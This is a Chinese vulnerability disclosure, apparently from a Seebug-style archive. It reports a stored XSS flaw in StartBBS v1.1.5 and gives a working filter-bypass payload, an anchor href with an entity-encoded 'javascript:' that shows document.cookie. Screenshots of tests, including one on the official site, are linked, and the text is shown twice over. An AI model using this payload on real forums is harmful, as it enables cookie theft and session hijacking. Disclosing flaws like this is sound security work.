### 简要描述: 版本号:startbbs_v1.1.5 某处存在存储型xss漏洞 ### 详细说明: 今天没事看了看startbbs,发现它的过滤函数和cmseasy差不多,后来试了试果然存在xss。 具体是在论坛发帖处填入如下内容: ``` <a href=javasc&#114;ipt:alert(document.cookie)>测试</a> ``` 点击“测试”后弹出cookie: [<img src="https://images.seebug.org/upload/201404/21192827a802434ee756f974d418d272cf9a09ac.jpg" alt="q.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/21192827a802434ee756f974d418d272cf9a09ac.jpg) [<img src="https://images.seebug.org/upload/201404/211935288448613507abe694d2c99bc2bb45424c.jpg" alt="e.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/211935288448613507abe694d2c99bc2bb45424c.jpg) ### 漏洞证明: 官网测试也成功xss: [<img src="https://images.seebug.org/upload/201404/21193401d454168534994aed66a4fa96d50e06fe.jpg" alt="w.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/21193401d454168534994aed66a4fa96d50e06fe.jpg)
### 简要描述: 版本号:startbbs_v1.1.5 某处存在存储型xss漏洞 ### 详细说明: 今天没事看了看startbbs,发现它的过滤函数和cmseasy差不多,后来试了试果然存在xss。 具体是在论坛发帖处填入如下内容: ``` <a href=javasc&#114;ipt:alert(document.cookie)>测试</a> ``` 点击“测试”后弹出cookie: [<img src="https://images.seebug.org/upload/201404/21192827a802434ee756f974d418d272cf9a09ac.jpg" alt="q.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/21192827a802434ee756f974d418d272cf9a09ac.jpg) [<img src="https://images.seebug.org/upload/201404/211935288448613507abe694d2c99bc2bb45424c.jpg" alt="e.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/211935288448613507abe694d2c99bc2bb45424c.jpg) ### 漏洞证明: 官网测试也成功xss: [<img src="https://images.seebug.org/upload/201404/21193401d454168534994aed66a4fa96d50e06fe.jpg" alt="w.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/21193401d454168534994aed66a4fa96d50e06fe.jpg)